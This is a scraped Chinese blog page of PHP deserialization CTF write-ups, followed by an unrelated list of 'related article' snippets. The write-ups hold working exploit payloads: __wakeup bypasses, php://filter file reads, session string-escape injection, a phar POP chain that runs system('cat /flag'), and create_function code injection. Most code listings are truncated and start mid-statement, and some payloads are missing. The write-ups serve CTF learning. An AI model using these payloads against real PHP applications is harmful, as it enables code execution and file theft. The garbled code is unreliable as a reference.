奫M
奫M

PHP反序列化刷题

1.攻防世界 unserialize3

class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=

poc

O:4:"xctf":1:{s:4:"flag";s:3:"111";} 

让输出报错:O:4:"xctf":2:{s:4:"flag";s:3:"111";} 

PHP反序列化刷题_第1张图片

2.攻防世界Web_php_unserialize

file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
}

 poc

Tzo0OiJEZW1vIjoxOntzOjEwOiIARGVtbwBmaWxlIjtzOjg6ImZsNGcucGhwIjt9

 PHP反序列化刷题_第2张图片

TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

PHP反序列化刷题_第3张图片

3.[SWPUCTF 2021 新生赛]ez_unserialize

admin ="user";
        $this->passwd = "123456";
    }

        public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}

$p = $_GET['p'];
unserialize($p);

?>

poc

PHP反序列化刷题_第4张图片

4[SWPUCTF 2022 新生赛]1z_unserialize

lt;

        $a($this->lly);
     }
    
    
}
unserialize($_POST['nss']);
highlight_file(__FILE__);
 
 
?>

poc

五。[SWPUCTF 2022 新生赛]ez_ez_unserialize

x = $x;
    }
    function __wakeup()
    {
        if ($this->x !== __FILE__) {
            $this->x = __FILE__;
        }
    }
    function __destruct()
    {
        highlight_file($this->x);
        //flag is in fllllllag.php
    }
}
if (isset($_REQUEST['x'])) {
    @unserialize($_REQUEST['x']);
} else {
    highlight_file(__FILE__);
}

poc

_wakeup()绕过

PHP反序列化刷题_第5张图片

 六。[UUCTF 2022 新生赛]ez_unser debug002

a=1;
        $this->b=2;
        $this->c=3;
    }
    public function __wakeup(){
        $this->a='';
    }
    public function __destruct(){
        $this->b=$this->c;
        eval($this->a);
    }
}
$a=$_GET['a'];
if(!preg_match('/test":3/i',$a)){
    die("你输入的不正确!!!搞什么!!");
}
$bbb=unserialize($_GET['a']);

限制了test:3所以无法绕过wakeup()

发现

 $this->b=$this->c;

那么就可以把命令写在c,然后代码会赋值给b,这是我们设置a恒等于b就能讲命令传入a

a =&$test ->b;
echo serialize($test);

?>

PHP反序列化刷题_第6张图片

a =&$test ->b;
echo serialize($test);

?>

七.[HNCTF 2022 WEEK2]easy_unser

want = $want;
        else $this->want = $this->todonothing;
    }
    function __wakeup(){
        $About_me = "When the object is unserialized,I will be called";
        $but = "I can CHANGE you";
        $this-> want = $but;
        echo "C1ybaby!";
        
    }
    function __destruct(){
        $About_me = "I'm the final function,when the object is destroyed,I will be called";
        echo "So,let me see if you can get what you want\n";
        if($this->todonothing === $this->want)
            die("鲍勃,别傻愣着!\n");
        if($this->want == "I can CHANGE you")
            die("You are not you....");
        if($this->want == "f14g.php" OR is_file($this->want)){
            die("You want my heart?No way!\n");
        }else{
            echo "You got it!";
            highlight_file($this->want);
            }
    }
}

    class unserializeorder{
        public $CORE = "人类最大的敌人,就是无序. Yahi param vaastavikta hai!
";
        function __sleep(){
            $About_me = "When the object is serialized,I will be called";
            echo "We Come To HNCTF,Enjoy the ser14l1zti0n 
";
        }
        function __toString(){
            $About_me = "When the object is used as a string,I will be called";
            return $this->CORE;
        }
    }
    
    $obj = new unserializeorder();
    echo $obj;
    $obj = serialize($obj);
    

    if (isset($_GET['ywant']))
    {
        $ywant = @unserialize(@$_GET['ywant']);
        echo $ywant;
    }
?>

根据代码,需要通过body的function __destruct中的highlight_file($this->want);去读取文件fl4g.php。倒推,首先让want=fl4g.php,但是want不能为fl4g.php并且不能为文件,这里就可以用上伪装协议去读取文件。todenothing不能等于want(这个好办)。want不能等于I can CHANGE you,上面——wakeup有赋值,要用到wakeup绕过。

这里 construct和类:unserializeorder都没不会用到就不管了

  poc



//O%3A4%3A%22body%22%3A2%3A%7Bs%3A10%3A%22%00body%00want%22%3Bs%3A30%3A%22php%3A%2F%2Ffilter%2Fresource%3Df14g.php%22%3Bs%3A17%3A%22%00body%00todonothing%22%3Bs%3A6%3A%22benben%22%3B%7D

然后手动把元素个数改一下

?ywant=O%3A4%3A"body"%3A3%3A{s%3A10%3A"%00body%00want"%3Bs%3A30%3A"php%3A%2F%2Ffilter%2Fresource%3Df14g.php"%3Bs%3A17%3A"%00body%00todonothing"%3Bs%3A6%3A"benben"%3B}

八。[安洵杯 2019]easy_serialize_php Blu3Boy

 source_code';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

 首先通过f=phpinfo获取flag的文件

 目标:通过file_get_contents显示d0g3_f1ag.php

倒推:$userinfo['img']=base64_encode('d0g3_f1ag.php')

$_SESSION['img']=base64_encode('d0g3_f1ag.php')      (变量不可控)

$_SESSION['img']==base64_encode('guest_img.png')或sha1(base64_encode($_GET['img_path']))

$_SESSION['user']和$_SESSION['function']可通并进行了序列化和反序列化。(字符逃逸)

 先看一下序列化构造



a:3:{s:4:"user";s:1:"X";s:8:"function";s:2:"Y ";s:3:"img";s:5:"patch";}

明显要元素个数一直为3,改变img的值,需要把原本的img那段吐出来。

这时候分析,如果构造逃逸,原本function要被user吃掉,原本img要被吐出来。那么为了维持元素个数为三,就要再添加两个元素。也就是出来添加新的img还要再添加一个。(有点绕,看代码吧)





a:3:{s:4:"user";s:24:"";s:8:"function";s:62:"Y";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";s:1:"a";s:5:"patch";}";s:3:"img";s:9:"img_patch";}array(3) {
  ["user"]=>
  string(24) "";s:8:"function";s:62:"Y"
  ["img"]=>
  string(20) "L2QwZzNfZmxsbGxsbGFn"
  ["a"]=>
  string(5) "patch"
}

PHP反序列化刷题_第7张图片

九.[NISACTF 2022]babyserialize

fun=="show_me_flag"){
            hint();
        }
    }

    function __call($from,$val){
        $this->fun=$val[0];
    }

    public function __toString()
    {
        echo $this->fun;
        return " ";
    }
    public function __invoke()
    {
        checkcheck($this->txw4ever);
        @eval($this->txw4ever);
    }
}

class TianXiWei{
    public $ext;
    public $x;
    public function __wakeup()
    {
        $this->ext->nisa($this->x);
    }
}

class Ilovetxw{
    public $huang;
    public $su;

    public function __call($fun1,$arg){
        $this->huang->fun=$arg[0];
    }

    public function __toString(){
        $bb = $this->su;
        return $bb();
    }
}

class four{
    public $a="TXW4EVER";
    private $fun='abc';

    public function __set($name, $value)
    {
        $this->$name=$value;
        if ($this->fun = "sixsixsix"){
            strtolower($this->a);
        }
    }
}

if(isset($_GET['ser'])){
    @unserialize($_GET['ser']);
}else{
    highlight_file(__FILE__);
}

//func checkcheck($data){
//  if(preg_match(......)){
//      die(something wrong);
//  }
//}

//function hint(){
//    echo ".......";
//    die();
//}
?>

 pop思路

eval
NISA _invoke  
Ilovetxw _toString
 four_set        
Ilovetxw _call    
TianXiWei_wakeup  

chekchek绕过SYSTEM

ext=new Ilovetxw();
$ser->ext->huang=new four();
$ser->ext->huang->a=new Ilovetxw();
$ser->ext->huang->a->su=new NISA();
echo serialize($ser);
echo urlencode(serialize($ser));

十[SWPUCTF 2021 新生赛]babyunser  

头要炸了。pop思路跟上题差不多但是里面加了可控参数。

这只分析class.php

name='aa';
    }

    public function __destruct(){
        $this->name=strtolower($this->name);
    }
}

class ff{
    private $content;
    public $func;

    public function __construct(){
        $this->content="\";
    }

    public function __get($key){
        $this->$key->{$this->func}($_POST['cmd']);
    }
}

class zz{
    public $filename;
    public $content='surprise';

    public function __construct($filename){
        $this->filename=$filename;
    }

    public function filter(){
        if(preg_match('/^\/|php:|data|zip|\.\.\//i',$this->filename)){
            die('这不合理');
        }
    }

    public function write($var){
        $filename=$this->filename;
        $lt=$this->filename->$var;
        //此功能废弃,不想写了
    }

    public function getFile(){
        $this->filter();
        $contents=file_get_contents($this->filename);
        if(!empty($contents)){
            return $contents;
        }else{
            die("404 not found");
        }
    }

    public function __toString(){
        $this->{$_POST['method']}($_POST['var']);
        return $this->content;
    }
}

class xx{
    public $name;
    public $arg;

    public function __construct(){
        $this->name='eval';
        $this->arg='phpinfo();';
    }

    public function __call($name,$arg){
        $name($arg[0]);
    }
}

利用的xx_call

执行命令

pop思路

xx_call        $name=system  $arg[0]=cat /flag
ff_get         func=system   $cmd=cat /flag
zz_write    
zz_tostring     method=write var=content
aa_destruct

跟上题一样写poc但是ff_content是私有变量,这只能用_construct()了

content=new xx();
		}
}
class zz{
    public $filename;
    public $content;

}
class xx{
    public $name;
    public $arg;
}

$a =new aa();
$a->name=new zz();
$a->name->filename=new ff();

echo serialize($a);
$phar = new Phar("aiwin1.phar");
$phar->startBuffering();
$phar->setStub(""); //设置stub
 
$phar->setMetadata($a); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

 playload

file=phar://upload/251261f15dceb80168305393c3780df5.txt&method=write&var=content&cmd=cat /flag

十一。bugku-unserialize-Noteasy

要通过参数构造一个内部方法。越来越离谱了。

a = $a;
        $this->b = $b;
        $this->check($a.$b);
        eval($a.$b);
    }


    public function __destruct()
    {
        $a = (string)$this->a;
        $b = (string)$this->b;
        $this->check($a.$b);
        $a("", $b);
    }


    private function check($str)
    {
        if (preg_match_all("(ls|find|cat|grep|head|tail|echo)", $str) > 0) die("You are a hacker, get out");
    }


    public function setAB($a, $b)
    {
        $this->a = $a;
        $this->b = $b;
    }
}

没有new 所以construct直接不看,

destruct

        $a("", $b);
当
$a = "create_function";
$b = ";};要执行的命令/*;";

则 `$a("", $b);` 相当于
create_function("", ";};要执行的命令;/*");

// 相当于创建了一个这样的函数
function ()
{

}
要执行的命令;
/*;}

顺带一提,如果$b在前面($a($b, "");)同样可以利用此方法

$a = "create_function";
$b = "){}要执行的命令;/*";

即create_function("){}要执行的命令;/*", "");

 

 

 

 

你可能感兴趣的:(php,开发语言)

  • php软件开发--laravel框架 周先森开发 laravellaravel
    lv6开发测试站点:http://lv6.gqqf.xyz/admin/index/indexcomposer简介及安装:composer是PHP中用来管理依赖关系的工具一句话,composer是一个工具,是为php项目准备的软件管家。laravel简介,安装,目录结构,运行:PHPWeb开发框架compsoser下载laravel:composercreate-project--prefer-d
  • PHP之laravel框架 phpweiyi phplaravel数学建模vue.js
    写在开头的一些话下面的图片是我用laravel框架做出的一个作品,接下来我会用我学到的知识来讲解laravel框架。目录序言laravel简介一、foreach循环语句二、if循环语句三、extends四、csrf五、自动加载类(ClassAuto-loading)六、单元测试(Unit-Testing)1.创建测试类:2.编写测试方法:3.运行单元测试:4.查看测试结果:七、数据缓存1.缓存一个
  • 【PHP】Laravel 介绍 史上最优雅的 PHP 框架 Ustinian_310 laravelphp
    1.Laravel介绍Laravel是一个开源的PHPWeb应用框架,由TaylorOtwell创建并于2011年6月首次发布。它遵循模型-视图-控制器(MVC)架构模式,旨在简化Web开发的任务,提供了一套丰富的功能,帮助开发者快速构建安全、可扩展的Web应用程序。附注:文末附有Laravel的社区入口,感兴趣的小伙伴可以去社区寻找更多学习资料以下是Laravel的一些主要特点和组件:核心特点M
  • PHP Laravel框架 模型与数据库 余味鱼尾 数据库phplaravel
    在Laravel框架中,模型与数据库是最核心的部分之一。模型是Laravel与数据库交互的主要方式,而数据库操作则通过Laravel的EloquentORM(对象关系映射)实现。Eloquent提供了一个非常强大且直观的方式来处理数据,使得与数据库的交互变得更加简单和高效。1.了解Laravel的数据库操作Laravel使用EloquentORM作为数据库交互的主要方式。ORM是一种映射关系型数据
  • PHP Laravel框架 迁移与填充 余味鱼尾 phplaraveloracle
    在Laravel中,迁移(Migrations)和填充(Seeding)是管理数据库的两个重要概念。它们为数据库操作提供了结构化、版本化以及灵活的解决方案,使得数据库的管理更加高效和便捷。下面将详细介绍这两者的核心概念及应用,帮助你快速理解并掌握它们。1.迁移(Migrations)迁移是Laravel提供的数据库结构版本控制系统。它允许你通过PHP代码来创建和修改数据库结构,而不需要直接编写SQ
  • PHP laravel框架 路由与控制器的使用 余味鱼尾 php数据库mysql
    1.Laravel路由基础1.1路由是什么?路由是Laravel的核心功能之一,决定了当用户访问不同的URL时,系统应该执行什么样的操作。可以理解为请求和响应的桥梁,路由决定了HTTP请求(如GET、POST等)应该被哪个控制器、方法或者闭包函数来处理。路由通常会出现在routes/web.php(处理浏览器请求)或者routes/api.php(处理API请求)中。1.2基本路由在Laravel
  • PHP Laravel框架的安装使用 余味鱼尾 数据库phpmysql后端
    1.安装PHP和Composer首先,确保你已经在开发机器上安装了PHP和Composer(PHP的依赖管理工具)。安装PHP你可以从PHP官方网站下载并安装PHP。安装时确保PHP的版本至少是7.4或更高版本。安装ComposerComposer是PHP的包管理工具,Laravel依赖它来安装框架的各类依赖。你可以从Composer官方网站下载并安装Composer。可以使用以下命令检查是否安装
  • PHP Laravel框架架构 余味鱼尾 数据库phpmysql后端
    1.根目录结├──app/├──artisan├──bootstrap/├──config/├──database/├──public/├──resources/├──routes/├──storage/├──tests/├──.env├──.gitignore├──composer.json├──package.json├──phpunit.xml└──README.md2.重要目录和文件说明1
  • 【玄机】流量特征分析-小王公司收到的钓鱼邮件 2401_84302796 网络
    Content-Length:85834x-powered-by:PHP/7.4.33content-description:FileTransfercontent-disposition:attachment;filename=TD.zipcontent-transfer-encoding:binaryexpires:0cache-control:must-revalidate,post-che
  • wordpress代码结构解析 程序员阿凡提 PHP实战教程WordPress代码解析
    WordPress是一个基于PHP和MySQL的开源内容管理系统(CMS),广泛用于构建网站和博客。要解析WordPress代码,首先需要了解其核心结构、主要文件和常用的函数。以下是WordPress代码解析的基本指南:---###1.**WordPress核心文件结构**WordPress的核心文件位于安装目录下,以下是一些关键文件和目录:-**wp-admin**:包含WordPress后台管
  • php yii 微信支付宝,Yii使用easywechat实现微信支付 爱吃生菜的鱼 phpyii微信支付宝
    您现在的位置是:网站首页>>微信>>微信公众号Yii使用easywechat实现微信支付发布时间:2019-04-3011:43:07作者:wangjian浏览量:1142点赞量:0一:微信公众号申请微信支付申请微信公众号的微信支付申请这里就不进行叙述了二:yii配置支付配置这里我使用的是max-wen/yii2-easy-wechat,所以这里我参考的是3.X版本的文档2:微信支付配置'WECH
  • thinkphp5使用easywechat集成微信扫码支付 骑猪行钢线 后端语言
    微信扫码支付用起来还是很方便的,如果使用微信支付官方的sdk开发也是可以的,不过还是选择了easywechat,主要还是因为easywechat集成了各种功能,基本上和微信相关的接口都做了比较不错的封装,因为要同时使用很多功能,索性微信扫码支付也一并用easywechat做了,而且不得不说使用方法是十分的简单,不多说了直接上步骤:1,使用composer在thinkphp5项目的根目录安装easy
  • Github 2025-01-12 php开源项目日报 Top10 老孙正经胡说 githubphp开源Github趋势分析开源项目PythonGolang
    根据GithubTrendings的统计,今日(2025-01-12统计)共有10个项目上榜。根据开发语言中项目的数量,汇总情况如下:开发语言项目数量PHP项目10JavaScript项目1Shell项目1SymfonyPHP框架和组件创建周期:5130天开发语言:PHP协议类型:MITLicenseStar数量:28999个Fork数量:9440次关注人数:28999人贡献人数:368人Open
  • Github 2025-01-28 Python开源项目日报 Top9 老孙正经胡说 githubpython开发语言Github趋势分析开源项目PythonGolang
    根据GithubTrendings的统计,今日(2025-01-28统计)共有9个项目上榜。根据开发语言中项目的数量,汇总情况如下:开发语言项目数量Python项目9Rust项目1ComfyUI:强大而模块化的稳定扩散GUI创建周期:399天开发语言:Python,JavaScript协议类型:GNUGeneralPublicLicensev3.0Star数量:25663个Fork数量:2741次
  • Github 2024-08-18 php开源项目日报 Top10 老孙正经胡说 githubphp开源Github趋势分析开源项目PythonGolang
    根据GithubTrendings的统计,今日(2024-08-18统计)共有10个项目上榜。根据开发语言中项目的数量,汇总情况如下:开发语言项目数量PHP项目10Shell项目1Blade项目1JavaScript项目1SecLists-安全测试人员的伴侣创建周期:4375天开发语言:PHP协议类型:MITLicenseStar数量:52010个Fork数量:23569次关注人数:52010人贡
  • Github 2024-07-14 php开源项目日报 Top10 老孙正经胡说 githubphp开源Github趋势分析开源项目PythonGolang
    根据GithubTrendings的统计,今日(2024-07-14统计)共有10个项目上榜。根据开发语言中项目的数量,汇总情况如下:开发语言项目数量PHP项目10CSS项目1SymfonyPHP框架和组件创建周期:5130天开发语言:PHP协议类型:MITLicenseStar数量:28999个Fork数量:9440次关注人数:28999人贡献人数:368人OpenIssues数量:846个Gi
  • fastadmin加密生成token 阿巴资源站 PHP后端
    安装gitsudoyuminstallgit在项目中安装firebase/php-jwtcomposerrequirefirebase/php-jwt注意:PHP7.4以上,安装fileinfo如果还有问题在PHP配置里禁止:;disable_functions=passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc
  • 开源 OA 办公系统 自不量力的A同学 人工智能
    目前尚未有关于勾股OA5.6.8新春版发布的相关确切信息,但勾股OAv5.6已于2025年1月19日发布2。勾股OA是一款基于ThinkPHP6+Layui+MySql打造的实用的开源的企业办公系统2。勾股OAv5.6的相关信息如下2:系统特点系统各功能模块一目了然,操作简单,拥有通用型的后台权限管理框架,可全覆盖跟踪员工的操作记录。集成了系统设置、人事管理、行政管理、消息管理、企业公告、知识库、
  • 怎么创建一个能在线测试php的html5网页? 很酷的站长 编程记录html5专题php专题phphtml5开发语言
    代码示例:一、搭建服务器环境首先,你需要在服务器上搭建PHP运行环境。如果你使用的是Linux服务器,可以使用Apache或Nginx作为Web服务器,并安装PHP解释器。对于Windows服务器,可以使用WAMP(Windows,Apache,MySQL,PHP)或XAMPP等集成环境。二、创建HTML表单页面创建一个HTML页面,包含一个表单,用户可以在表单中输入PHP代码,将该代码提交到服务
  • 一个简单的php博客 很酷的站长 php专题phpandroid开发语言
    一个简单的PHP博客的示例代码:收起phpconnect_error){die("连接失败:".$conn->connect_error);}//查询文章$sql="SELECTid,title,content,created_atFROMarticlesORDERBYcreated_atDESC";$result=$conn->query($sql);if($result->num_rows>0
  • 2024最新在线工具箱网站系统源码 很酷的站长 源码大全工具箱源码站长工具
    (购买本专栏可免费下载栏目内所有资源不受限制,持续发布中,需要注意的是,本专栏为批量下载专用,并无法保证某款源码或者插件绝对可用,介意不要购买!购买本专栏住如有什么源码需要,可向博主私信,第二天即可发布!博主有几万资源)2024最新在线工具箱网站系统源码是一款功能强大的在线工具箱程序,您可以通过安装扩展来增强其功能。同时,该程序还提供了插件模板的功能,让您可以将其作为网页导航使用。本源码需要PHP
  • 一个简单的自适应html5导航模板 很酷的站长 html5专题csscss3前端
    一个简单的HTML导航模板示例,它包含基本的导航栏结构,同时使用了CSS进行样式美化,让导航栏看起来更美观。另外,还添加了一些JavaScript代码,用于在移动端实现导航菜单的展开和收起功能。PHP网址导航模板body{font-family:Arial,sans-serif;margin:0;padding:0;background-color:#f4f4f4;}header{backgrou
  • 网页中间件安全加固 jasonwgz 中间件安全tomcat
    一、APACHEWEB服务器软件,apache的程序名是httpd,服务的控制:systemctlstart/stop/statushttpdApache是一个静态网站程序,不能直接支持动态页面;若要支持动态页面,则需要整合其它程序,如要支持PHP动态页面:yuminstallphp-fpmphp-commonphp-develphp-mysqlndphp-mbstringphp-mcrypt安装
  • 计算机毕业设计JAVA房屋租赁系统mybatis 煦洋cxsj985 mybatisjava开发语言
    计算机毕业设计JAVA房屋租赁系统mybatis计算机毕业设计JAVA房屋租赁系统mybatis+源码+调试部署+系统+数据库+lw本源码技术栈:项目架构:B/S架构开发语言:Java语言开发软件:ideaeclipse前端技术:Layui、HTML、CSS、JS、JQuery等技术后端技术:JAVA运行环境:Win10、JDK1.8数据库:MySQL5.7/8.0源码地址:https://pan
  • ctfshow-web入门-命令执行(web32-36) HkD01L #命令执行ctfshowweb安全
    web32
  • 【课程设计推荐】基于JSP的论文格式化系统后台模块的设计与实现 想念@思恋 课程设计jspjava课程设计javajsp
    关注【墨岚创客】,回复【毕设】,赠送免费毕设资源,具体联系方式见文末摘要论文的格式修改是一件很麻烦的事情,一篇论文在定稿以前为了让格式达到标准,需要修改很多次,浪费了大量时间。本系统的设计初衷就是为了解决论文书写格式的规范化,方便学者论文格式的自动生成。本系统是基于Java平台的Web应用程序。采用JSP作为后台开发语言,HTML和JavaScript作为前台开发语言,MYSQL5.0作为后台数据
  • JDK7 正则表达式 捕获组命名 u010466329 正则表达式正则表达式
    jdk6之前的正则表达式不支持命名捕获组功能,只能通过捕获组的索引来访问捕获组。当正则表达式比较复杂的时候,里面含有大量的捕获组和非捕获组,通过从左至右数括号来得知捕获组的计数也是一件很烦人的事情;而且这样做代码的可读性也不好,当正则表达式需要修改的时候也会改变里面捕获组的计数。解决这个问题的方法是通过给捕获组命名来解决,就像Python,PHP,.Net以及Perl这些语言里的正则表达式一样.新
  • ACTF2020 新生赛 Upload 1 xinjuun CTF网络安全
    打开网页发现是个文件上传的页面,试着上传php文件,发现不行后,尝试burp抓包,修改文件后缀,进行前端绕过,发现可行。具体步骤如下:1、书写一句话木马,例如:eval和assert:php任意代码执行的一句话后门,我们喜欢用的是传统的eval,php5,7通用。create_function和preg_replace函数:create_function,它的作用是创建一个匿名函数,在内部也相当于
  • PHP代码免费加密平台:保护你的代码安全 网友阿贵 PHPphp
    PHP代码免费加密平台:保护你的代码安全引言在开发过程中,保护源代码的安全性是非常重要的。PHP作为一种广泛使用的服务器端脚本语言,其代码的安全性尤为重要。为了帮助开发者更好地保护自己的代码,我们推出了PHP代码免费加密平台(php.javait.cn)。本文将详细介绍该平台的功能和使用方法。平台简介1.平台功能PHP代码免费加密平台提供了以下主要功能:PHP混淆加密:无需安装组件运行,兼容主流P
  • 【详解】CentOS6.5下搭建LAMP环境 牛肉胡辣汤 php
    CentOS6.5下搭建LAMP环境在Linux系统上搭建LAMP(Linux、Apache、MySQL、PHP)环境是许多Web开发者的基本技能之一。本文将详细介绍如何在CentOS6.5系统上搭建一个完整的LAMP环境。环境准备操作系统:CentOS6.5软件版本:Apache:2.2.xMySQL:5.1.xPHP:5.3.x确保你的CentOS6.5已经安装并可以正常访问互联网。安装Apa
  • 算法 单链的创建与删除 换个号韩国红果果 c算法
    先创建结构体 struct student { int data; //int tag;//标记这是第几个 struct student *next; }; // addone 用于将一个数插入已从小到大排好序的链中 struct student *addone(struct student *h,int x){ if(h==NULL) //??????
  • 《大型网站系统与Java中间件实践》第2章读后感 白糖_ java中间件
           断断续续花了两天时间试读了《大型网站系统与Java中间件实践》的第2章,这章总述了从一个小型单机构建的网站发展到大型网站的演化过程---整个过程会遇到很多困难,但每一个屏障都会有解决方案,最终就是依靠这些个解决方案汇聚到一起组成了一个健壮稳定高效的大型系统。          看完整章内容,
  • zeus持久层spring事务单元测试 deng520159 javaDAOspringjdbc
    今天把zeus事务单元测试放出来,让大家指出他的毛病, 1.ZeusTransactionTest.java 单元测试   package com.dengliang.zeus.webdemo.test; import java.util.ArrayList; import java.util.List; import org.junit.Test; import
  • Rss 订阅 开发 周凡杨 htmlxml订阅rss规范
                    RSS是 Really Simple Syndication的缩写(对rss2.0而言,是这三个词的缩写,对rss1.0而言则是RDF Site Summary的缩写,1.0与2.0走的是两个体系)。   RSS
  • 分页查询实现 g21121 分页查询
    在查询列表时我们常常会用到分页,分页的好处就是减少数据交换,每次查询一定数量减少数据库压力等等。 按实现形式分前台分页和服务器分页: 前台分页就是一次查询出所有记录,在页面中用js进行虚拟分页,这种形式在数据量较小时优势比较明显,一次加载就不必再访问服务器了,但当数据量较大时会对页面造成压力,传输速度也会大幅下降。 服务器分页就是每次请求相同数量记录,按一定规则排序,每次取一定序号直接的数据
  • spring jms异步消息处理 510888780 jms
    spring JMS对于异步消息处理基本上只需配置下就能进行高效的处理。其核心就是消息侦听器容器,常用的类就是DefaultMessageListenerContainer。该容器可配置侦听器的并发数量,以及配合MessageListenerAdapter使用消息驱动POJO进行消息处理。且消息驱动POJO是放入TaskExecutor中进行处理,进一步提高性能,减少侦听器的阻塞。具体配置如下:
  • highCharts柱状图 布衣凌宇 hightCharts柱图
    第一步:导入 exporting.js,grid.js,highcharts.js;第二步:写controller   @Controller@RequestMapping(value="${adminPath}/statistick")public class StatistickController {  private UserServi
  • 我的spring学习笔记2-IoC(反向控制 依赖注入) aijuans springmvcSpring 教程spring3 教程Spring 入门
    IoC(反向控制 依赖注入)这是Spring提出来了,这也是Spring一大特色。这里我不用多说,我们看Spring教程就可以了解。当然我们不用Spring也可以用IoC,下面我将介绍不用Spring的IoC。 IoC不是框架,她是java的技术,如今大多数轻量级的容器都会用到IoC技术。这里我就用一个例子来说明: 如:程序中有 Mysql.calss 、Oracle.class 、SqlSe
  • TLS java简单实现 antlove javasslkeystoretlssecure
      1. SSLServer.java package ssl; import java.io.FileInputStream; import java.io.InputStream; import java.net.ServerSocket; import java.net.Socket; import java.security.KeyStore; import
  • Zip解压压缩文件 百合不是茶 Zip格式解压Zip流的使用文件解压
       ZIP文件的解压缩实质上就是从输入流中读取数据。Java.util.zip包提供了类ZipInputStream来读取ZIP文件,下面的代码段创建了一个输入流来读取ZIP格式的文件; ZipInputStream in = new ZipInputStream(new FileInputStream(zipFileName));     &n
  • underscore.js 学习(一) bijian1013 JavaScriptunderscore
            工作中需要用到underscore.js,发现这是一个包括了很多基本功能函数的js库,里面有很多实用的函数。而且它没有扩展 javascript的原生对象。主要涉及对Collection、Object、Array、Function的操作。       学
  • java jvm常用命令工具——jstatd命令(Java Statistics Monitoring Daemon) bijian1013 javajvmjstatd
    1.介绍         jstatd是一个基于RMI(Remove Method Invocation)的服务程序,它用于监控基于HotSpot的JVM中资源的创建及销毁,并且提供了一个远程接口允许远程的监控工具连接到本地的JVM执行命令。         jstatd是基于RMI的,所以在运行jstatd的服务
  • 【Spring框架三】Spring常用注解之Transactional bit1129 transactional
    Spring可以通过注解@Transactional来为业务逻辑层的方法(调用DAO完成持久化动作)添加事务能力,如下是@Transactional注解的定义:   /* * Copyright 2002-2010 the original author or authors. * * Licensed under the Apache License, Version
  • 我(程序员)的前进方向 bitray 程序员
    作为一个普通的程序员,我一直游走在java语言中,java也确实让我有了很多的体会.不过随着学习的深入,java语言的新技术产生的越来越多,从最初期的javase,我逐渐开始转变到ssh,ssi,这种主流的码农,.过了几天为了解决新问题,webservice的大旗也被我祭出来了,又过了些日子jms架构的activemq也开始必须学习了.再后来开始了一系列技术学习,osgi,restful.....
  • nginx lua开发经验总结 ronin47
    使用nginx lua已经两三个月了,项目接开发完毕了,这几天准备上线并且跟高德地图对接。回顾下来lua在项目中占得必中还是比较大的,跟PHP的占比差不多持平了,因此在开发中遇到一些问题备忘一下 1:content_by_lua中代码容量有限制,一般不要写太多代码,正常编写代码一般在100行左右(具体容量没有细心测哈哈,在4kb左右),如果超出了则重启nginx的时候会报 too long pa
  • java-66-用递归颠倒一个栈。例如输入栈{1,2,3,4,5},1在栈顶。颠倒之后的栈为{5,4,3,2,1},5处在栈顶 bylijinnan java
    import java.util.Stack; public class ReverseStackRecursive { /** * Q 66.颠倒栈。 * 题目:用递归颠倒一个栈。例如输入栈{1,2,3,4,5},1在栈顶。 * 颠倒之后的栈为{5,4,3,2,1},5处在栈顶。 *1. Pop the top element *2. Revers
  • 正确理解Linux内存占用过高的问题 cfyme linux
    Linux开机后,使用top命令查看,4G物理内存发现已使用的多大3.2G,占用率高达80%以上: Mem:   3889836k total,  3341868k used,   547968k free,   286044k buffers Swap:  6127608k total,&nb
  • [JWFD开源工作流]当前流程引擎设计的一个急需解决的问题 comsci 工作流
         当我们的流程引擎进入IRC阶段的时候,当循环反馈模型出现之后,每次循环都会导致一大堆节点内存数据残留在系统内存中,循环的次数越多,这些残留数据将导致系统内存溢出,并使得引擎崩溃。。。。。。       而解决办法就是利用汇编语言或者其它系统编程语言,在引擎运行时,把这些残留数据清除掉。
  • 自定义类的equals函数 dai_lm equals
    仅作笔记使用 public class VectorQueue { private final Vector<VectorItem> queue; private class VectorItem { private final Object item; private final int quantity; public VectorI
  • Linux下安装R语言 datageek R语言 linux
    命令如下:sudo gedit  /etc/apt/sources.list1、deb http://mirrors.ustc.edu.cn/CRAN/bin/linux/ubuntu/ precise/ 2、deb http://dk.archive.ubuntu.com/ubuntu hardy universesudo apt-key adv --keyserver ke
  • 如何修改mysql 并发数(连接数)最大值 dcj3sjt126com mysql
    MySQL的连接数最大值跟MySQL没关系,主要看系统和业务逻辑了   方法一:进入MYSQL安装目录 打开MYSQL配置文件 my.ini 或 my.cnf查找 max_connections=100 修改为 max_connections=1000 服务里重起MYSQL即可   方法二:MySQL的最大连接数默认是100客户端登录:mysql -uusername -ppass
  • 单一功能原则 dcj3sjt126com 面向对象的程序设计软件设计编程原则
    单一功能原则[ 编辑]     SOLID 原则 单一功能原则 开闭原则 Liskov代换原则 接口隔离原则 依赖反转原则 查   论   编 在面向对象编程领域中,单一功能原则(Single responsibility principle)规定每个类都应该有
  • POJO、VO和JavaBean区别和联系 fanmingxing VOPOJOjavabean
